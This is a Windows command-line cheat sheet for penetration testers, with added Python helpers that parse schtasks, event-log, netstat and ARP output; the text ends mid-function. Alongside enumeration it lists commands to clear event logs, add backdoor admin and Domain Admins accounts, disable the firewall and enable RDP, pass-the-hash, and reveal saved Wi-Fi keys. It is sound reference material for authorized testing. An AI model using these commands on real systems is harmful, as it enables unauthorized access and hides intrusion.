hacktricks/windows-hardening/basic-cmd-for-pentesters.md
2023-08-03 19:12:22 +00:00


Basic Win CMD for Pentesters


System information

Version and patch information

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info

wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates

hostname

DRIVERQUERY #3rd party driver vulnerable?

CMD Basics

CMD (Command Prompt) is the command-line interpreter of Windows: it executes commands and performs administrative tasks through a text-based interface. The commands below are the minimum a pentester lands on; the rest of this page goes into each area in depth.

System Information

  • systeminfo: Displays detailed information about the computer's hardware and software configuration.

Network Information

  • ipconfig: Displays the IP configuration for all network interfaces on the computer.
  • netstat: Displays active network connections, listening ports, and related network statistics.

File and Directory Management

  • dir: Lists the files and directories in the current directory.
  • cd: Changes the current directory.
  • mkdir: Creates a new directory.
  • del: Deletes a file.

Process Management

  • tasklist: Displays a list of currently running processes.
  • taskkill: Terminates a running process.

User Management

  • net user: Displays information about user accounts and allows for user management.

Registry Management

  • reg query: Displays the values and subkeys of a specified registry key.
  • reg add: Adds a new registry entry or modifies an existing one.

Service Management

  • sc query: Displays the status of services on the computer.
  • sc start: Starts a service.
  • sc stop: Stops a running service.

Task Scheduler

  • schtasks: Displays or modifies scheduled tasks on the computer.

Remote Desktop

  • mstsc: Opens the Remote Desktop Connection client.

Environment

set #List all environment variables

Some environment variables worth highlighting:

  • COMPUTERNAME: computer name
  • TEMP/TMP: temporary folder
  • USERNAME: user name
  • HOMEPATH/USERPROFILE: home directory
  • windir: C:\Windows
  • OS: Windows operating system
  • LOGONSERVER: name of the domain controller that authenticated this logon
  • USERDNSDOMAIN: DNS name of the domain
  • USERDOMAIN: NetBIOS name of the domain

nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC

Mounted disks

Mounted volumes are the storage devices attached to the system and reachable by the OS; extra volumes (backup disks, removable media, VHDs) often hold data the primary disk does not. mountvol lists every volume GUID path together with its mount point, if any:

C:\> mountvol

Possible values for VolumeName along with current mount points are:

    \\?\Volume{<GUID>}\
        *** NO MOUNT POINTS ***

    \\?\Volume{<GUID>}\
        C:\

    \\?\Volume{<GUID>}\
        D:\

A volume marked NO MOUNT POINTS has no drive letter but is still reachable through its \\?\Volume{<GUID>}\ path (mountvol D:\ \\?\Volume{<GUID>}\ assigns it one). The drive-letter views below are quicker, and the fsutil fallback works when wmic is absent:

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

Defender

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, services and software

Processes

tasklist /V #List processes (verbose: session, CPU time, window title and the user running each)
tasklist /SVC #Links processes to the services they host
taskkill /PID <PID> #Terminate a process by PID
taskkill /IM <process_name> #Terminate a process by image name (add /F to force)

Services

sc query #List of services (add state= all to include stopped ones)
sc start <service_name>
sc stop <service_name>
net start #Windows Services started
wmic service list brief #List services

Software

wmic product get name,version #Installed MSI packages (slow, and Win32_Product triggers a consistency check of every package)
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

Scheduled tasks

schtasks /query /fo LIST /v #Verbose output of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v | findstr /C:"Task To Run" /C:"Run As User" #cmd-native version of the cat/grep pipeline: pair each binary with the account it runs as and look for SYSTEM tasks pointing at writable paths
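The findstr pipeline above only pairs lines; deciding which SYSTEM tasks are worth attacking (a binary outside a protected directory, or an unquoted path with spaces that Windows resolves prefix by prefix) is easier offline on saved output. The following Python script is an added example, not code from this page or from HackTricks: it parses the text of schtasks /query /fo LIST /v and returns the tasks that run as a privileged account from a suspicious location. The sample output, the list of protected roots and the "interesting" criteria are constructed assumptions for illustration.

```python
# Constructed sample of `schtasks /query /fo LIST /v` output (not captured from a real host).
SAMPLE_SCHTASKS = """\
Folder: \\
HostName:                             WS01
TaskName:                             \\Backup Sync
Next Run Time:                        8/4/2023 2:00:00 AM
Status:                               Ready
Last Result:                          0
Author:                               WS01\\admin
Task To Run:                          C:\\Tools\\Backup Sync\\sync.exe --full
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Daily

HostName:                             WS01
TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Next Run Time:                        N/A
Status:                               Ready
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -o -$
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM
Schedule Type:                        Weekly

HostName:                             WS01
TaskName:                             \\UserCleanup
Next Run Time:                        N/A
Status:                               Ready
Last Result:                          0
Author:                               WS01\\alice
Task To Run:                          "C:\\Users\\alice\\cleanup.bat"
Scheduled Task State:                 Enabled
Run As User:                          alice
Schedule Type:                        At logon time
"""

# Accounts whose tasks are worth hijacking (assumption: adjust to the engagement).
HIGH_PRIV = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSERVICE", "NETWORKSERVICE"}
# Roots that are normally writable only by administrators (assumption for this example).
PROTECTED_ROOTS = ("c:\\windows", "c:\\program files", "%windir%", "%systemroot%", "%programfiles%")
EXECUTABLE_EXT = (".exe", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".dll", ".msc")


def parse_schtasks_list(text):
    """Split `/fo LIST /v` output into one dict per task; records are separated by blank lines."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        if ":" not in line or line.startswith("Folder:"):
            continue
        key, _, value = line.partition(":")   # first colon only: values like C:\... keep theirs
        current[key.strip()] = value.strip()
    if current:
        tasks.append(current)
    return tasks


def command_binary(task_to_run):
    """Executable part of a 'Task To Run' value, honouring a quoted first token."""
    cmd = task_to_run.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def is_unquoted_with_spaces(task_to_run):
    """True when the first unquoted token is a truncated path ('C:\\Tools\\Backup' of 'C:\\Tools\\Backup Sync\\sync.exe')."""
    cmd = task_to_run.strip()
    if cmd.startswith('"') or " " not in cmd:
        return False
    return not cmd.split(" ", 1)[0].lower().endswith(EXECUTABLE_EXT)


def find_interesting_tasks(text):
    """Privileged tasks whose binary sits outside protected roots or is an unquoted path with spaces."""
    findings = []
    for task in parse_schtasks_list(text):
        user = task.get("Run As User", "").upper()
        cmd = task.get("Task To Run", "")
        if user not in HIGH_PRIV or cmd in ("", "N/A"):
            continue
        reasons = []
        if not command_binary(cmd).lower().startswith(PROTECTED_ROOTS):
            reasons.append("binary outside protected roots")
        if is_unquoted_with_spaces(cmd):
            reasons.append("unquoted path with spaces")
        if reasons:
            findings.append((task["TaskName"], cmd, reasons))
    return findings


if __name__ == "__main__":
    for name, cmd, reasons in find_interesting_tasks(SAMPLE_SCHTASKS):
        print(f"{name}: {cmd}  <- {', '.join(reasons)}")
```

Run it against a real dump with schtasks /query /fo LIST /v > schtasks.txt and feed the file contents to find_interesting_tasks; each hit still needs icacls on the binary or on the prefix directories to confirm the path is actually writable.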

Domain information

The whois and dig commands in this section are not part of Windows and belong on the attacking host; nslookup is built in and covers the same DNS queries.

Whois

whois <domain>

Registration data for the domain: registrant, registrar and registration dates.

DNS

nslookup <domain>

Resolves the domain and shows which DNS server answered.

Zone Transfer

nslookup
> server <dns-server>
> ls -d <domain>

Requests a full zone transfer (AXFR) from <dns-server>. It only succeeds when the server allows transfers to arbitrary clients, which is a misconfiguration worth reporting on its own.

MX Records

nslookup -type=mx <domain>

Mail servers associated with the domain.

TXT (SPF) Records

nslookup -type=txt <domain>

TXT records, which include the SPF policy (v=spf1 ...) naming the hosts allowed to send mail for the domain.

Name Servers

nslookup -type=ns <domain>

Authoritative name servers of the domain. NS records do not enumerate subdomains; use the zone transfer above or a wordlist for that.

The same queries with dig:

dig axfr @<dns-server> <domain>
dig mx <domain>
dig txt <domain>
dig ns <domain>

# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Logs and events

Windows event logs record logons, privilege use, service installs, process creation (when enabled) and more; they are read with Event Viewer or wevtutil. The logs a pentester meets most often:

  • Application: events written by applications.
  • Security: logon attempts, privilege use, object access and other audit events (only what the audit policy enables is written here).
  • System: operating system, driver and service events.
  • Setup: installation of updates, roles and features.
  • Forwarded Events: events collected from other computers through Windows Event Forwarding.

Querying a log

wevtutil qe <log_name> /f:text /c:1 /rd:true

Prints the newest event of the log in readable form (/rd:true reads newest first, /c:N limits the count). There is no follow mode: re-run it to poll.

Backing up a log

wevtutil epl <log_name> <backup_file.evtx>

Exports the log to an .evtx file, which preserves the evidence before your own activity adds to it.

Clearing a log

wevtutil cl <log_name>

Replace <log_name> with the name of the log, such as Application, Security or System. Clearing logs is rarely in scope for an authorized test and is itself loud: clearing the Security log writes event 1102 ("The audit log was cleared"), clearing any other log writes System event 104, and copies already forwarded to a collector survive. Prefer exporting the log and recording what your activity generated.

Windows Event Forwarding and Sysmon

Windows Event Forwarding ships events from many hosts to a central collector (a subscription is configured, the source computers are pointed at the collector, and forwarding is then verified), so what you see locally may already be elsewhere. Sysmon adds detailed process-creation, network-connection and file-creation events to the Microsoft-Windows-Sysmon/Operational channel; both are what a blue team will correlate your activity from.

What to look for when reading the logs

  • Failed logons (4625), and bursts of them from one source: brute force or password spraying.
  • Special privileges assigned to a new logon (4672) and members added to groups (4728 global, 4732 local): privilege escalation.
  • Suspicious network connections (Sysmon event 3) and process creation (4688, Sysmon event 1).
  • Unauthorized access attempts and file modifications (object-access auditing, 4663).

Read this way, the logs show both the security posture of the host and whether someone else got there before you.

#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
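Reading the Security log by eye stops scaling after a few hundred events; the analysis the list above describes (failed logons grouped by source and target, and the 1102 log-clear event that any "cover your tracks" step leaves behind) is a few lines of parsing over wevtutil qe Security /f:text output. The following Python script is an added example, not code from this page or from HackTricks: it parses the text format wevtutil emits, counts 4625 failures per (source address, account) pair against a threshold, and lists every 1102. The event records are constructed samples built from a template, and the threshold of 3 is an assumption.

```python
import re
from collections import Counter


def _failed_logon(n, date, src, account):
    """Constructed 4625 record in the layout `wevtutil qe Security /f:text` prints."""
    return f"""Event[{n}]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: {date}
  Event ID: 4625
  Keyword: Audit Failure
  Computer: WS01.corp.local
  Description: 
An account failed to log on.

Subject:
\tSecurity ID:\t\tS-1-0-0
\tAccount Name:\t\t-
\tAccount Domain:\t\t-

Logon Type:\t\t\t3

Account For Which Logon Failed:
\tSecurity ID:\t\tS-1-0-0
\tAccount Name:\t\t{account}
\tAccount Domain:\t\tCORP

Network Information:
\tWorkstation Name:\tKALI
\tSource Network Address:\t{src}
\tSource Port:\t\t51234
"""


# Constructed sample log (not captured from a real host): three failures against
# "administrator" from one address, one against "bob", a success, then a log clear.
SAMPLE_EVENTS = "".join([
    _failed_logon(0, "2023-08-03T19:01:05.120", "10.11.1.5", "administrator"),
    _failed_logon(1, "2023-08-03T19:01:06.310", "10.11.1.5", "administrator"),
    _failed_logon(2, "2023-08-03T19:01:07.480", "10.11.1.5", "administrator"),
    _failed_logon(3, "2023-08-03T19:03:40.000", "10.11.1.7", "bob"),
    """Event[4]:
  Log Name: Security
  Source: Microsoft-Windows-Security-Auditing
  Date: 2023-08-03T19:02:10.000
  Event ID: 4624
  Keyword: Audit Success
  Computer: WS01.corp.local
  Description: 
An account was successfully logged on.
""",
    """Event[5]:
  Log Name: Security
  Source: Microsoft-Windows-Eventlog
  Date: 2023-08-03T19:05:00.000
  Event ID: 1102
  Keyword: Audit Success
  Computer: WS01.corp.local
  Description: 
The audit log was cleared.
Subject:
\tSecurity ID:\tS-1-5-21-1004336348-1177238915-682003330-1105
\tAccount Name:\tjdoe
\tDomain Name:\tCORP
\tLogon ID:\t0x3E7A1
""",
])


def parse_wevtutil_text(text):
    """One dict per event: the 'Key: value' header fields plus the raw Description body."""
    events = []
    for chunk in re.split(r"^Event\[\d+\]:[ \t]*$", text, flags=re.M):
        if not chunk.strip():
            continue
        header, _, description = chunk.partition("Description:")
        event = {}
        for line in header.splitlines():
            key, sep, value = line.strip().partition(":")
            if sep:
                event[key.strip()] = value.strip()
        event["Description"] = description.strip()
        events.append(event)
    return events


def field(description, name, last=False):
    """Value of a 'Name:<tabs>value' line in the description body (first or last occurrence)."""
    values = re.findall(rf"^[ \t]*{re.escape(name)}:[ \t]*(.*?)[ \t]*$", description, flags=re.M)
    if not values:
        return None
    return values[-1] if last else values[0]


def analyse_security_log(text, threshold=3):
    """Count 4625 failures per (source, target) pair and flag every 1102 log-clear event."""
    failures, cleared = Counter(), []
    for ev in parse_wevtutil_text(text):
        desc = ev["Description"]
        if ev.get("Event ID") == "4625":
            # 4625 carries 'Account Name' twice: the Subject first, then the account that failed.
            target = field(desc, "Account Name", last=True)
            failures[(field(desc, "Source Network Address") or "?", target)] += 1
        elif ev.get("Event ID") == "1102":
            cleared.append((ev.get("Date"), field(desc, "Account Name")))
    return {"failed_logons": dict(failures),
            "bruteforce": {k: n for k, n in failures.items() if n >= threshold},
            "log_cleared": cleared}


if __name__ == "__main__":
    print(analyse_security_log(SAMPLE_EVENTS))
```

On a real host, export with wevtutil qe Security /f:text /c:5000 > sec.txt (or run the /r: remote form from the line above) and pass the file contents to analyse_security_log; the same parser works for any channel, so the 104 events from the System log can be checked the same way.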

Users & Groups

Users

#Me
whoami #Current user
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net user <username> #Info about another user
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user <username> <password> /add #Create user
net user <username> <new_password> #Change a user's password
net user <username> /delete #Delete user

# Other users logged in
qwinsta #Anyone else logged in?

#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon sessions as administrator using logonsessions from Sysinternals
logonsessions.exe
logonsessions64.exe

Groups

Each local user can belong to one or more local groups, and group membership is what grants most rights on a workstation. Built-in groups worth checking:

  • Administrators: full control over the system.
  • Users: all standard users.
  • Guests: limited access for guest accounts.
  • Power Users: kept for compatibility with older software; on current Windows it grants no rights beyond Users unless a security template adds them.
  • Backup Operators: can back up and restore any file regardless of its ACL (SeBackupPrivilege/SeRestorePrivilege), enough to copy the SAM and SYSTEM hives.
  • Remote Desktop Users: may log on through Remote Desktop.
  • Remote Management Users: may connect through WinRM.
  • Network Configuration Operators: can change TCP/IP settings.
  • Print Operators: can manage printers.
  • Event Log Readers: can read event logs, including Security.
  • Hyper-V Administrators: full control over Hyper-V, including the virtual disks of every VM.

Changing group membership requires administrative privileges, and every change is audited (4732: member added to a local group).

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup <groupname> /add #Create a group
net localgroup <groupname> /delete #Delete a group
net localgroup administrators [username] /add #Add user to administrators
net localgroup administrators [username] /delete #Remove user from administrators

#Domain
net group /domain #Info about domain groups
net group <domain_group_name> /domain #Users that belong to the group

List sessions

net session #SMB sessions other computers have open to this host (client name, user, idle time); needs admin rights and does not show interactive logons
qwinsta #Interactive and RDP sessions on this host (session name, user, ID, state)
klist sessions #Logon sessions known to the Kerberos client (LUID and principal of each)

Password policy

The policy dictates how a password attack has to be paced: minimum length and complexity shape the wordlist, the lockout threshold and observation window set how many guesses per account are safe before you lock users out, and the password history and maximum age tell you how often users rotate (and recycle) passwords. net accounts prints the local policy; /domain prints the domain one:

net accounts

Credentials

Credentials (a username plus a password, hash or ticket) are what let you move from one host or account to the next, so harvesting them is a core task of any engagement. Common ways to obtain them: social engineering, dictionary and brute-force attacks, sniffing or man-in-the-middle on the network, exploiting OS vulnerabilities and, once on a host, the stores Windows keeps for the user. The commands below list which targets have saved credentials and under which username; the secrets themselves are DPAPI-protected and need a dedicated extraction tool, but a saved entry can be used as-is with runas /savecred.

cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access

Persistence with users

Creating an account and dropping it into a privileged local group is the simplest persistence; each group below grants a distinct capability (see Groups above). Both steps are audited (4720: user account created, 4732: member added to a local group), so expect them to be noticed on a monitored host.

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Remote Management Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power Users" UserLoginName /add
net localgroup "Backup Operators" UserLoginName /add
net localgroup "Performance Monitor Users" UserLoginName /add
net localgroup "Performance Log Users" UserLoginName /add
net localgroup "Event Log Readers" UserLoginName /add
net localgroup "Distributed COM Users" UserLoginName /add
net localgroup "IIS_IUSRS" UserLoginName /add
net localgroup "Cryptographic Operators" UserLoginName /add
net localgroup "Hyper-V Administrators" UserLoginName /add

Network

Interfaces, routes, ports, hosts and DNS cache

ipconfig /all #Info about interfaces (IP, MAC, DNS servers, DHCP lease)
route print #Print available routes (other networks reachable from this host)
arp -a #Known hosts (IP-to-MAC cache of machines this host talked to recently)
netstat -ano #Opened ports? (-a all connections and listeners, -n numeric, -o owning PID; map the PID with tasklist)
type C:\WINDOWS\System32\drivers\etc\hosts #Static name overrides (editable with notepad given admin rights)
ipconfig /displaydns #DNS cache: names this host resolved recently
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
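netstat -ano gives you ports and PIDs and tasklist gives you PIDs and image names; the question a pentester actually has ("which process owns each listener, and is it bound to loopback or to every interface?") needs the two joined. The following Python script is an added example, not code from this page or from HackTricks: it parses constructed netstat -ano and tasklist /fo csv output (the CSV form is far easier to parse than the table) and returns one row per listener with its exposure and owning process. The sample outputs are constructed, not captured from a real host.

```python
import csv
import io

# Constructed sample of `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1288
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       5120
  TCP    192.168.1.10:49700     10.0.0.5:443           ESTABLISHED     3344
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1200
  UDP    0.0.0.0:5353           *:*                                    5120
"""

# Constructed sample of `tasklist /fo csv` output.
TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","152 K"
"svchost.exe","912","Services","0","12,340 K"
"svchost.exe","1200","Services","0","8,100 K"
"svchost.exe","1288","Services","0","9,812 K"
"chrome.exe","3344","Console","1","210,004 K"
"devserver.exe","5120","Console","1","44,000 K"
"""

WILDCARD = ("0.0.0.0", "[::]")
LOOPBACK = ("127.0.0.1", "[::1]")


def parse_netstat(text):
    """One dict per TCP/UDP row. UDP rows have no State column, so their PID sits one field left."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[0], parts[1], parts[2]
        state, pid = (parts[3], parts[4]) if proto == "TCP" else ("", parts[3])
        host, _, port = local.rpartition(":")   # rpartition keeps IPv6 brackets intact
        rows.append({"proto": proto, "host": host, "port": int(port),
                     "foreign": foreign, "state": state, "pid": int(pid)})
    return rows


def parse_tasklist_csv(text):
    """Map PID -> image name from `tasklist /fo csv`."""
    return {int(row["PID"]): row["Image Name"] for row in csv.DictReader(io.StringIO(text))}


def listening_services(netstat_text, tasklist_text):
    """Listeners joined with their owning process and how widely each is exposed."""
    procs = parse_tasklist_csv(tasklist_text)
    found = set()   # a dual-stack service listens on 0.0.0.0 and [::]; report it once
    for r in parse_netstat(netstat_text):
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue
        if r["host"] in LOOPBACK:
            exposure = "loopback"
        elif r["host"] in WILDCARD:
            exposure = "all interfaces"
        else:
            exposure = "single interface"
        # PID 4 is the System process: kernel-mode listeners (SMB on 445, http.sys) appear under it.
        image = procs.get(r["pid"], "pid %d (no longer running)" % r["pid"])
        found.add((r["proto"], r["port"], exposure, image))
    return sorted(found)


if __name__ == "__main__":
    for proto, port, exposure, image in listening_services(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"{proto:<4} {port:<6} {exposure:<16} {image}")
```

Loopback-only listeners (the 8080 devserver above) are invisible from the network but become reachable the moment you have a foothold, and svchost.exe owners are worth resolving further with tasklist /SVC to learn which service is behind the port.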

Firewall

The Windows firewall filters inbound and outbound traffic per profile (domain, private, public) using rules keyed on address, port, protocol and program. For a pentester it decides which of the listeners found with netstat are actually reachable from the network and whether your own tooling (RDP, a bind shell, SMB) can connect. netsh firewall is the legacy context kept for compatibility; netsh advfirewall is the current one.

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Turn On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Shares

Shares are folders or printers exported over SMB so that other hosts can reach them. Listing them shows which data is reachable from the network and which hosts you can reach in turn.

View shares

net share

Lists every share on this host with its path, including the administrative shares (C$, ADMIN$, IPC$).

Create a share

net share <share_name>=<path> [/GRANT:<user>,<permissions>] [/REMARK:<text>]

<share_name> is the share name and <path> the folder; the optional /GRANT parameter sets a user and permission (READ, CHANGE or FULL) and /REMARK adds a comment.

Delete a share

net share <share_name> /DELETE

Change share permissions

net share <share_name> /GRANT:<user>,<permissions>

Connect to a share

net use <drive_letter>: \\server\share [/USER:<user>] [<password>]

<drive_letter> is the letter to map, \\server\share the share path, /USER the account to authenticate as and <password> its password; omit the password to be prompted for it, which keeps it out of the command history.

Disconnect a share

net use <drive_letter>: /DELETE

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wi-Fi

netsh wlan show interfaces #Currently connected network
netsh wlan show networks #Networks in range
netsh wlan show profile #Saved profiles (AP SSIDs)
netsh wlan show profile <SSID> key=clear #Get cleartext pass of a saved profile
netsh wlan connect name="<profile>" #Connect to a saved profile
netsh wlan disconnect
netsh wlan delete profile name="<profile>" #Forget a saved network

#Hosted network (software AP), e.g. to share the host's connection; newer drivers may report it as not supported
netsh wlan set hostednetwork mode=allow ssid="<ssid>" key="<password>"
netsh wlan start hostednetwork
netsh wlan show hostednetwork #Status and connected clients
netsh wlan stop hostednetwork

SNMP

SNMP (Simple Network Management Protocol) is used to manage and monitor network devices: a manager queries agents over UDP for information organised in MIBs (system status, interfaces, traffic, errors). On a Windows host the SNMP service configuration lives in the registry, including the community strings that act as passwords and the managers allowed to query it; a readable community string gives the same visibility into the host from the network.

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network interfaces

ipconfig /all lists every adapter with its IP address, subnet mask, default gateway, MAC address, DNS servers and DHCP lease; netsh interface show interface adds the administrative and operational state of each. A host with adapters on several networks (a second NIC, a VPN adapter, a virtual switch) is a pivoting opportunity.

ipconfig /all

ARP table

The ARP (Address Resolution Protocol) table is a network mapping table that associates IP addresses with their corresponding MAC addresses. It is used by network devices to determine the MAC address of a destination IP address before sending data packets. The ARP table is stored in the memory of a device and is constantly updated as devices communicate on the network.

To view the ARP table on a Windows system, you can use the arp command in the command prompt. Simply open the command prompt and type arp -a to display the ARP table. The output will show the IP addresses and corresponding MAC addresses of devices that the system has communicated with.

The ARP table is useful for troubleshooting network connectivity issues, identifying devices on the network, and detecting potential ARP spoofing attacks. By analyzing the ARP table, you can verify if the correct MAC address is associated with each IP address and identify any discrepancies or suspicious entries.

It's important to note that the ARP table is specific to each device and is not shared across the network. Therefore, each device maintains its own ARP table based on its network interactions.

arp -A
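A parser for `arp -a` output that flags the discrepancy the text above describes, one unicast MAC claimed by several IP addresses on the same interface. This is an added example, not part of the original page; the ARP output it scans is constructed, not captured from a real host.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output (not captured from a real host).
# The gateway 192.168.1.1 and the host 192.168.1.20 share one MAC, which is the
# kind of entry the text above says to look for.
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.1.50 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-01     dynamic
  192.168.1.20          aa-bb-cc-dd-ee-01     dynamic
  192.168.1.30          aa-bb-cc-dd-ee-30     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static

Interface: 10.0.0.5 --- 0x12
  Internet Address      Physical Address      Type
  10.0.0.1              00-11-22-33-44-55     dynamic
  10.0.0.255            ff-ff-ff-ff-ff-ff     static
"""

IFACE_RE = re.compile(r"^Interface:\s+(\S+)\s+---\s+0x[0-9a-fA-F]+")
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"           # IPv4 address
    r"([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+"  # MAC in the dash form Windows prints
    r"(dynamic|static)\s*$"
)


def parse_arp_table(text):
    """Return {interface_ip: [(ip, mac, type), ...]} parsed from `arp -a` text."""
    table = defaultdict(list)
    current = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m and current is not None:
            ip, mac, kind = m.groups()
            table[current].append((ip, mac.lower(), kind))
    return dict(table)


def is_group_address(mac):
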